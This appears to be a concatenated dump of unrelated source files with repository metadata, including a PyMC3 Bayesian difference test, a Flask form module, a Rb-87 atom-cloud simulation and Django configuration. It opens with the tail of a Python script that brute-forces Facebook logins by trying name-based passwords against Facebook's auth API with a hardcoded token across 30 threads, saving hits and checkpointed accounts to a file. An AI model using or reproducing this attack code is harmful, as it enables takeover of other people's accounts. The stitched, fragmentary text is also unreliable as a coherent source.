print '\x1b[1;96m[\x1b[1;92mOK\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass5 + ' - ' + b['name']
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCP\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass5 + ' - ' + b['name']
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = b['last_name']+'1122'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mOK\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass6 + ' - ' + b['name']
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCP\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass6 + ' - ' + b['name']
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
pass7 = b['first_name']+'786'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mOK\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass7 + ' - ' + b['name']
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCP\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass7 + ' - ' + b['name']
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
else:
pass8 = b['last_name']+'786'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass8)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mOK\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass8 + ' - ' + b['name']
oks.append(user+pass8)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCP\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass8 + ' - ' + b['name']
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass8+"\n")
cek.close()
cekpoint.append(user+pass8)
else:
pass9 = b['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass9)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mOK\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass9 + ' - ' + b['name']
oks.append(user+pass9)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCP\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass9 + ' - ' + b['name']
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass9+"\n")
cek.close()
cekpoint.append(user+pass9)
else:
pass10 = b['last_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass10)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mOK\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass10 + ' - ' + b['name']
oks.append(user+pass10)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCP\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass10 + ' - ' + b['name']
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass10+"\n")
cek.close()
cekpoint.append(user+pass10)
else:
pass11 = ('786786')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass11)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mOK\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass11 + ' - ' + b['name']
oks.append(user+pass11)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCP\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass11 + ' - ' + b['name']
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass11+"\n")
cek.close()
cekpoint.append(user+pass11)
else:
pass12 = ('000786')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass12)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mOK\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass12 + ' - ' + b['name']
oks.append(user+pass12)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCP\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass12 + ' - ' + b['name']
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass12+"\n")
cek.close()
cekpoint.append(user+pass12)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\033[1;96m•◈•───────────────•◈•\033[1;92mALEY*KASHAN\033[1;96m•◈•───────────────•◈•"
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mProcess Complete \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;96m[+] \033[1;92mCP File Saved \033[1;91m: \033[1;97mout/super_cp.txt")
raw_input("\n\033[1;96m[\033[1;97mBack\033[1;96m]")
super()
if __name__ == '__main__':
login()
|
[
"[email protected]"
] | |
60b4bc818f8aeec5c6472c707d341e83ee9e4bab
|
d43de3e1133190f3e18803fd6046459bb0553b38
|
/best_test.py
|
8d4a62a7111849fcc3f06b491ffe7e64826abbb2
|
[
"MIT"
] |
permissive
|
mkazmier/best-test
|
5274d9848347581c7b9527d8f973f29b5a32807f
|
d1d8897055f543da7ec67cb579ca9092604cdb56
|
refs/heads/master
| 2021-07-07T11:33:35.070691 | 2017-10-03T11:00:28 | 2017-10-03T11:00:28 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,385 |
py
|
import pymc3 as pm
class BayesianDifferenceTest:
"""Perform a Bayesian test for difference of means and standard deviations between two samples.
Inspired by the classic BEST paper by Kruschke.
"""
def __init__(self, param_a_name, param_b_name, mu_mean, mu_sd, sd_lower, sd_upper, nu_mean):
"""Initialize the test.
Parameters
----------
param_a_name, param_b_name : str
Names for the tested parameters.
mu_mean, mu_sd : float
Mean and standard deviation of the prior on mean.
sd_upper, sd_lower : float
Upper and lower bounds of the prior on standard deviation.
nu_mean : float
The mean of the prior on normality (aka 'degrees of freedom').
"""
self.param_a_name = param_a_name
self.param_b_name = param_b_name
self.mu_mean = mu_mean
self.mu_sd = mu_sd
self.sd_lower = sd_lower
self.sd_upper = sd_upper
self.nu_mean = nu_mean
self._varnames = {
'mean_param_a': '{}_mean'.format(self.param_a_name),
'mean_param_b': '{}_mean'.format(self.param_b_name),
'sd_param_a' : '{}_sd'.format(self.param_a_name),
'sd_param_b' : '{}_sd'.format(self.param_b_name),
'nu' : 'nu',
'diff_means' : 'difference_of_means',
'diff_sds' : 'difference_of_sds'
}
def _build_model(self, observed_a, observed_b):
self.model = pm.Model()
with self.model as model:
# normal priors for means
mean_param_a = pm.Normal(self._varnames['mean_param_a'], self.mu_mean, self.mu_sd)
mean_param_b = pm.Normal(self._varnames['mean_param_b'], self.mu_mean, self.mu_sd)
# uniform priors standard deviations
sd_param_a = pm.Uniform(self._varnames['sd_param_a'], self.sd_lower, self.sd_upper)
sd_param_b = pm.Uniform(self._varnames['sd_param_b'], self.sd_lower, self.sd_upper)
# shifted exponential prior for normality (aka 'degrees of freedim')
nu = pm.Exponential(self._varnames['nu'], 1 / self.nu_mean) + 1
# the data is assumed to come from Student's t distribution since it models data with outliers well
# it is not realted to Student's t test in this case
# pymc3 uses precision instead of sd for Student's t
lambda_param_a = sd_param_a ** -2
lambda_param_b = sd_param_b ** -2
data_param_a = pm.StudentT('data_param_a', nu=nu, mu=mean_param_a, lam=lambda_param_a, observed=observed_a)
data_param_b = pm.StudentT('data_param_b', nu=nu, mu=mean_param_b, lam=lambda_param_b, observed=observed_b)
diff_means = pm.Deterministic(self._varnames['diff_means'], mean_param_a - mean_param_b)
diff_sds = pm.Deterministic(self._varnames['diff_sds'], sd_param_a - sd_param_b)
def run(self, observed_a, observed_b, nsamples=2000, njobs=1):
"""Run the inference on the model.
Parameters
----------
observed_a, observed_b : array-like
The observed data for the test.
nsamples : int, optional
The number of samples for MCMC (default 2000).
njobs : int, optional
the number of concurrent processes to use for sampling (default 1).
"""
self._build_model(observed_a, observed_b)
with self.model as model:
self.trace = pm.sample(nsamples, njobs=njobs)
def plot_posterior(self, varnames=None, ref_val=None):
"""Generate informative plots form the trace.
Parameters
----------
varnames : iterable of str or None, optional
The model variables to generate plots for (default None).
If None, defaults to all variables.
ref_val: int or float or None, optional
The value to use as reference on the plots (default None).
Generally only relevant for posteriors on differences of means
and standard deviations. For example, if ref_val = 0, a bar will
be placed on the posterior plot at a point corresponding to
zero difference in parameters. If this bar lies within the 95% HPD,
then it is likely that there is no significant difference between
the parameters.
"""
varnames = varnames or self.model_variables
pm.plot_posterior(self.trace, varnames=varnames, ref_val=ref_val, color='#8BCAF1')
def forestplot(self, varnames=None):
"""Generate a forestplot with 95% credible intervals and R hat statistic.
Parameters
----------
varnames : iterable of str or None, optional
The model variables to generate plots for (default None).
If None, defaults to all variables.
"""
varnames = varnames or self.model_variables
pm.forestplot(self.trace, varnames=varnames, color='#8BCAF1')
def traceplot(self):
"""Generate a traceplot for MCMC diagnostics."""
pm.traceplot(self.trace)
def summary(self, varnames=None):
"""Generate summary statistics for model as Pandas dataframe.
Parameters
----------
varnames : iterable of str or None, optional
The model variables to generate summaries for (default None).
If None, defaults to all variables.
Returns
-------
summary : pandas.DataFrame
The dataframe with summary statistics.
"""
varnames = varnames or self.model_variables
return pm.df_summary(self.trace, varnames=varnames)
@property
def model_variables(self):
"""Get model variables.
Returns
-------
varnames : list of str
The names of model variables.
"""
return list(self._varnames.values())
|
[
"[email protected]"
] | |
8a2f3e9208b69376adaa77424ffcaf983fc436f6
|
c3d4a88e8a5d97b6cd45382161aa3565f822526e
|
/pythonapp/intellihistory/apps.py
|
415a45ab3dd29eef316fda7b8966e98ae83500fa
|
[
"MIT"
] |
permissive
|
ashna111/intelli-history
|
69bde4110b3ae0152557951bf16bb2f10098d077
|
23ea8f7260f64b6dfe2b6cf095bd29e757f546ae
|
refs/heads/master
| 2020-05-30T12:19:28.972576 | 2019-08-17T19:15:55 | 2019-08-17T19:15:55 | 189,729,000 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 103 |
py
|
from django.apps import AppConfig
class IntellihistoryConfig(AppConfig):
name = 'intellihistory'
|
[
"[email protected]"
] | |
8c3039935e219d19bd45140590f6d01a01c5aee8
|
6bc40cc640b56d0c66a784289a72d9dce78df517
|
/src/sst/selftests/test_two_methods.py
|
e7a5a9135380ad8e2db47f9c48012405f49fc715
|
[
"Apache-2.0"
] |
permissive
|
Work4Labs/selenium-simple-test
|
2cad968582b6f9491bc842d4d08a5dcd67d321e6
|
9bebc85b783c9566a23d383ba5a9be434efbec85
|
refs/heads/master
| 2020-12-24T14:01:44.712125 | 2016-04-29T18:19:25 | 2016-04-29T18:19:25 | 9,199,948 | 6 | 2 | null | 2016-02-03T02:02:31 | 2013-04-03T16:56:04 |
Python
|
UTF-8
|
Python
| false | false | 181 |
py
|
from sst.actions import *
from sst import runtests
class TestBoth(runtests.SSTTestCase):
def test_one(self):
assert True
def test_two(self):
assert True
|
[
"[email protected]"
] | |
eaaa199710e402820402eb1c34822f07205426bd
|
2586b1b0de8671db58db1940b955470035565fc3
|
/scikit_flower_1.py
|
b3c65e504a12897623ae67ab328bbdc9d44ba235
|
[] |
no_license
|
ivantay2003/flowerml
|
faab42723a9972a99dd10ea849bb6db2f2494e1b
|
898102a3931c5864eaa5cc6b0b0cf74f0963f482
|
refs/heads/master
| 2022-01-09T03:19:18.579187 | 2019-07-22T02:31:39 | 2019-07-22T02:31:39 | 198,132,242 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,395 |
py
|
from sklearn.datasets import load_iris
from sklearn.datasets import load_digits
import numpy as np
from sklearn import tree
import seaborn as sns
from sklearn.metrics import accuracy_score
digital = load_digits()
iris = load_iris()
print (iris.target_names)
iris_target = iris.target;
iris_data = iris.data
sns.boxplot(data = iris_data,width=0.5,fliersize=5)
sns.set(rc={'figure.figsize':(1,10)})
sns.despine(offset=10, trim=True)
#print (digital.target)
iris_test_ids = np.random.permutation(len(iris_data))#randomly splitting the data set
#splitting and leaving last 15 entries for testing, rest for training
print ("iris_test_ids " + str(iris_test_ids))
iris_train_one = iris_data[iris_test_ids[:-15]]
iris_test_one = iris_data[iris_test_ids[-15:]]
iris_train_two = iris_target[iris_test_ids[:-15]]
iris_test_two = iris_target[iris_test_ids[-15:]]
iris_classify = tree.DecisionTreeClassifier()#using the decision tree for classification
iris_classify.fit(iris_train_one, iris_train_two) #training or fitting the classifier using the training set
iris_predict = iris_classify.predict(iris_test_one) #making predictions on the test dataset
print ("iris_predict :" + str (iris_predict)) #lables predicted (flower species)
print ("iris_test_two: " + str (iris_test_two))#actual labels
print ("accuracy_score : " + str (accuracy_score(iris_predict, iris_test_two)*100)) #accuracy metric
|
[
"[email protected]"
] | |
9876632e6db6b195c0bdd9d1e585ff36112b7603
|
f4cfcd20522b6db90cfb22c83892574a159ec609
|
/setup.py
|
ccfe83665c0b8095b5f1b0a81956c34d03b6a4c7
|
[
"MIT"
] |
permissive
|
rituraj254/simple-linear-regression-1
|
3f81eb78899b9d852d700c0f92d4707b4d66ec44
|
5f147ae0850aba6658a9fba707f132c76d61cb3b
|
refs/heads/main
| 2023-07-13T02:10:14.223667 | 2021-08-25T18:05:15 | 2021-08-25T18:05:15 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,519 |
py
|
import io
import os
import sys
from shutil import rmtree
from typing import Tuple, List
from setuptools import Command, setup
# Package meta-data
name = "simple-linear-regression_python"
description = "Simple Linear Regression in Python"
url = "https://github.com/drnitinmalik/simple-linear-regression"
email = "[email protected]"
author = "Nitin Malik"
requires_python = ">=3.0.0"
current_dir = "os.path.abspath(os.path.dirname(__file__))"
def get_long_description():
base_dir = os.path.abspath(os.path.dirname(__file__))
with io.open(os.path.join(base_dir, "README.md"), encoding="utf-8") as f:
return f.read()
class UploadCommand(Command):
description = "Build and publish the package"
user_options: List[Tuple] = []
@staticmethod
def status(s):
"""Print things in bold."""
print(s)
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
try:
self.status("Removing previous builds...")
rmtree(os.path.join(current_dir, "dist"))
except OSError:
pass
self.status("Building distribution...")
os.system(f"{sys.executable} setup.py sdist bdist_wheel --universal")
self.status("Uploading the package to PyPI via Twine...")
os.system("twine upload dist/*")
self.status("Pushing git tags...")
os.system("git tag v{}".format(about["__version__"]))
os.system("git push --tags")
sys.exit()
|
[
"[email protected]"
] | |
62e27de6af0b88d2d51e7df695b6b24b7bacf167
|
cdcbfae0fda98917bd18e14f72d92aa801af6f74
|
/class_samples/2-5_userinput/input.py
|
458781cb83dfcfd849cc1795497ba15c19112881
|
[] |
no_license
|
BiradaterA/lps_compsci
|
e67c5ef68f81035290383903b78adf48e45e9689
|
f058043d14b71e62e5a9d0e70841711de5ebbe78
|
refs/heads/master
| 2020-12-24T12:00:40.576839 | 2017-04-30T22:57:47 | 2017-04-30T22:57:47 | 73,103,783 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 395 |
py
|
# First one for hw
print("How old are you?")
age = int(raw_input()) + 10
print("In ten years you will be " + str(age) + " years old")
# Second one
print("How much does it cost you for a coke?")
price = raw_input()
print("How many Cokes will you drink today?")
amount = raw_input()
x = int(price) * int(amount)
print("Wow, you're going to spend " + str(x) + " dollars on sugar water today!")
|
[
"[email protected]"
] | |
327f5bed18063bc5103443d55e4856bea69453da
|
009c5522fe7fd1b6ffad167097535e592818c9d7
|
/app/inheritance/abstract/migrations/0003_auto_20191223_0545.py
|
02758dcc786385764c2036954dc49dd6a0eb3c57
|
[] |
no_license
|
moorekwon/django-document
|
d891d3d329bc697598517c0918e912da89cf5f6a
|
983de2babdabd106e17467af27bac4efced170b8
|
refs/heads/master
| 2021-09-29T00:37:04.647977 | 2019-12-26T09:07:55 | 2019-12-26T09:07:55 | 228,784,209 | 0 | 0 | null | 2021-09-22T18:10:05 | 2019-12-18T07:35:12 |
Python
|
UTF-8
|
Python
| false | false | 740 |
py
|
# Generated by Django 3.0 on 2019-12-23 05:45
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('abstract', '0002_childa_childb'),
]
operations = [
migrations.AlterField(
model_name='childa',
name='m2m',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='abstract_childa_set', to='abstract.Student'),
),
migrations.AlterField(
model_name='childb',
name='m2m',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='abstract_childb_set', to='abstract.Student'),
),
]
|
[
"[email protected]"
] | |
bf36f0bfeb79d182b6f679f3ce2fbef7ca0f037e
|
153e2356d4101516459488309613f5097b9365a8
|
/week6 - Сортировка/week6 - Результаты олимпиады.py
|
4e139e3e0311dc6e985deb1030a1d00076b393aa
|
[] |
no_license
|
MariaZork/Coursera-Python-Course
|
bd9500d0f705d74e1a13c6dcd2d9b65f7a4fa712
|
316f1cbdc90cb5cf903e17eaa68f27bc9cb26a09
|
refs/heads/master
| 2021-09-06T12:28:56.922695 | 2018-02-06T14:35:21 | 2018-02-06T14:35:21 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,764 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Sun Nov 12 02:28:36 2017
@author: Maria
"""
# В олимпиаде участвовало N человек. Каждый получил определенное количество
# баллов, при этом оказалось, что у всех участников разное число баллов.
# Упорядочите список участников олимпиады в порядке убывания набранных баллов.
# Формат ввода
# Программа получает на вход число участников олимпиады N. Далее идет N строк,
# в каждой строке записана фамилия участника, затем, через пробел, набранное
# им количество баллов.
# Формат вывода
# Выведите список участников (только фамилии) в порядке убывания
# набранных баллов.
# Тест 1
# Входные данные:
# 3
# Ivanov 15
# Petrov 10
# Sidorov 20
#
# Вывод программы:
# Sidorov
# Ivanov
# Petrov
#
# Тест 2
# Входные данные:
# 3
# Ivanov 15
# Petrov 20
# Sidorov 10
#
# Вывод программы:
# Petrov
# Ivanov
# Sidorov
#
# Тест 3
# Входные данные:
# 3
# Ivanov 10
# Petrov 15
# Sidorov 20
#
# Вывод программы:
# Sidorov
# Petrov
# Ivanov
N = int(input())
MyList = []
for i in range(N):
Tmp = input().split()
Surname = Tmp[0]
Score = int(Tmp[1])
T = (Surname, Score)
MyList.append(T)
MyList.sort(key=lambda Index: Index[1], reverse=True)
for i in range(0, len(MyList)):
print(MyList[i][0], end=' ')
|
[
"[email protected]"
] | |
2025f4ef19b96e9e2c5913d82afced71108eca7c
|
bab7fb81d6297f4afb6828c9b25d2e0cb89ef81d
|
/Atom_cloud.py
|
62f24a7ba93c81f5c1cbadf916840d5f387e2bdb
|
[] |
no_license
|
ollieennis1966/Group-Studies-
|
99739c58bb6efae0d25facf4e42b2e77d75e7cc9
|
ecf0f07c8cf141745fa4b7572fe7b42ec6753ed3
|
refs/heads/master
| 2021-01-02T20:33:43.693835 | 2020-02-13T21:55:28 | 2020-02-13T21:55:28 | 239,789,349 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,617 |
py
|
from Vector import Vector
import numpy as np
import matplotlib.pyplot as plt
import random
from math import sqrt, pi, exp, log10, sin, cos
class Cloud:
def __init__(self, Temp_0 = 1e-5, N = int(1e4), diameter = 1e-3):
"""
Initial conditions of the atom cloud: i.e. at time t = 0 when the MOT is turned off.
Assumptions: no interatomic collisions, cloud is uniform.
Initial radius, spatial and velocity distributions and temperature.
"""
hbar = 1.055e-34 # Planck's reduced constant
c = 3e8 # Speed of light in a vacuum
k = 1.38e-23 # Boltzmann constant
M = 1.443e-25 # Mass of Rb-87 atom
mean_velocity = sqrt((8*k*Temp_0)/(pi*M)) # Mean atom speed
radius = diameter/2 # Cloud radius
# Speed, velocity and spatial distributions
V, R = [], []
for i in range(0, N):
v = random.uniform(1e-5, 1) # Atom speed in MOT
Prob = ((M/(2*pi*k*Temp_0))**(3/2))*(4*pi*v**2)*exp(-(M*v**2)/(2*k*Temp_0)) # Boltzmann distribution function of atom speed
v *= Prob # Weighted atom speed
theta, phi = pi*random.uniform(-1, 1), 2*pi*random.random() # Polar and azimuthal angles
vx, vy, vz = v*sin(theta)*cos(phi), v*sin(theta)*sin(phi), v*cos(theta) # Velocity components
velocity = Vector(vx, vy, vz) # Velocity vector
V.append(velocity)
x, y, z = radius*random.uniform(-1, 1), radius*random.uniform(-1, 1), radius*random.uniform(-1, 1) # Position components
position = Vector(x, y, z) # Position vector
R.append(position)
self.k, self.M, self.N, self.hbar, self.c = k, M, N, hbar, c
self.velocity, self.position = V, R
def fall_expansion(self, g, dv, dt, n):
"""
Evolution of atom cloud spatial and velocity distributions after MOT is turned off,
due to gravity and thermal motion.
"""
velocity, position = self.velocity, self.position
Mean_V, Max_R = [], []
for j in range(0, n):
for i in range(0, self.N):
position[i] += velocity[i]*dt # Displacement of atom after time dt
velocity[i] += dv*Vector(random.uniform(-1, 1), random.uniform(-1, 1), random.uniform(-1, 1)) # Change in atom velocity caused by thermal motion
velocity[i][2] += g*dt # Change in atom speed along z-axis due to gravity
Mean_V.append(sqrt(sum(velocity[i][k]**2 for k in range(0, 3))))
Max_R.append(sqrt(position[i][0]**2 + position[i][1]**2))
mean_velocity = np.mean(Mean_V) # Mean atom speed after time dt
Temp = ((pi*self.M)/(8*self.k))*mean_velocity**2 # Temperature of atom cloud after time dt
radius = np.max(Max_R) # Radius of atom cloud in x-y plane after time dt
return mean_velocity, radius, velocity, position
def gaussian(self, I0, w0, l, z, r):
"""
Alignment of Raman beams with local gravity
Gaussian profile of Raman beams
"""
w = sqrt(w0**2 + ((l*z)/(pi/w0)**2))
I = I0*exp(-2*(r/w**2))
return I
def light_atom(self, i, theta1, theta2, omega, pulse):
"""
Momentum recoil exerted on atom by two-photon transition
"""
w1, w2 = 384.2e12 + 4.271e9, 384.2e12 - 2.563e9 # Frequencies of beam photons
k1, k2 = 2*pi*(w1/self.c), 2*pi*(w2/self.c) # wavevectors of beam photons
if i == -1: k_eff = k1*cos(theta1) - k2*cos(theta2) # Co-propagating beams
elif i == 1: k_eff = k1 + k2 # Counter-propagating beams
dp = self.hbar*k_eff # Momentum recoil of atom after two-photon transition
dv = dp/self.M # Change in z-axis speed due to atom-photon interactions
if pulse == 1: # 1st Raman pulse
cycle = 1/4
x = cloud_0
velocity, position = x[2], x[3] # Atom velocities and positions before 1st pulse
elif pulse == 2: # 2nd Raman pulse
cycle = 1/2
x = pulse1
velocity, position = x[0], x[1] # Atom velocities and positions before 2nd pulse
elif pulse == 3: # 3rd Raman pulse
cycle = 1/4
x = pulse2
velocity, position = x[0], x[1] # Atom velocities and positions before 3rd pulse
tau = ((2*pi)/omega)*cycle # Raman pulse length
pulse_length = np.linspace(0, tau, 100)
Prob_1 = np.sin(0.5*omega*pulse_length)**2 # Rabi oscillation
Prob_final = np.sin(0.5*omega*tau)**2 # Proportion of excited atoms at end of Raman pulse
plt.figure(figsize = (6, 4))
plt.plot(pulse_length, Prob_1, label = "P(Excitation)")
plt.xlabel("time")
plt.ylabel("Probability(time)")
plt.legend(loc = 'upper right')
plt.show()
for j in range(0, int(Prob_final*self.N)): # Fraction of atoms excited by Raman pulse
velocity[j][2] -= dv
position[j][2] -= dv*tau
return velocity, position
if __name__ == "__main__":
C = Cloud()
cloud_0 = C.fall_expansion(9.81, 1e-2, 1e-3, 10)
beam = C.gaussian(32, 2e-2, 780e-9, 1e-3, 1e-3)
pulse1 = C.light_atom(1, 0, 0, 1e6, 1)
pulse2 = C.light_atom(1, 0, 0, 1e6, 2)
pulse3 = C.light_atom(1, 0, 0, 1e6, 3)
|
[
"[email protected]"
] | |
8a042149ac8e1eed6ac7d024e0d49715100baf45
|
a228077f91b7fb1c2ce01ce28cd11a61f845900e
|
/app/main/forms.py
|
4bf0d4dc4f27a892939a9b98ca35c1dd39f749d4
|
[
"MIT"
] |
permissive
|
jerumanu/blogs
|
983a88340ff52153315b7145abb85e481ae4f17b
|
cf18679947de9a11f4f030a6f4b4ee4e66aef4da
|
refs/heads/master
| 2023-01-31T23:40:04.674537 | 2020-12-14T15:58:19 | 2020-12-14T15:58:19 | 320,576,900 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 546 |
py
|
from flask_wtf import FlaskForm
from wtforms import StringField,TextAreaField,SubmitField,SelectField
from wtforms.validators import Required
class UpdateProfile(FlaskForm):
bio = TextAreaField('Tell us about you.',validators = [Required()])
submit = SubmitField('Submit')
class OpinionForm(FlaskForm):
title = StringField('opinion Title')
opinion = TextAreaField('opinion')
submit = SubmitField('Submit')
class CommentForm(FlaskForm):
comment = TextAreaField('Comment')
submit = SubmitField('Post Comments')
|
[
"[email protected]"
] | |
149e72fac2e0d4c9c7498864b786dea80e5774cb
|
eddf03ad238da8731eadd8d4d46be335b216a5fd
|
/todo_list/settings.py
|
2ba85e9f0ba77ffcd7d726c68aa35e13e75de5d2
|
[] |
no_license
|
Gertobin11/ci-todo-django
|
f663d5b4a946ffef7b07ddfe261a4b44feea5667
|
33d2e991cb5679258f7f572904270fdd630f3099
|
refs/heads/master
| 2023-06-08T22:06:16.953048 | 2021-06-21T21:46:51 | 2021-06-21T21:46:51 | 377,287,589 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,605 |
py
|
"""
Django settings for todo_list project.
Generated by 'django-admin startproject' using Django 3.2.4.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
import os
from pathlib import Path
import dj_database_url
import django_heroku
development = os.environ.get("DEVELOPMENT", False)
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.environ.get("SECRET_KEY", '')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = development
if development:
ALLOWED_HOSTS = ["localhost"]
else:
ALLOWED_HOSTS = [os.environ.get("HEROKU_HOST_NAME")]
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'todo'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'todo_list.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
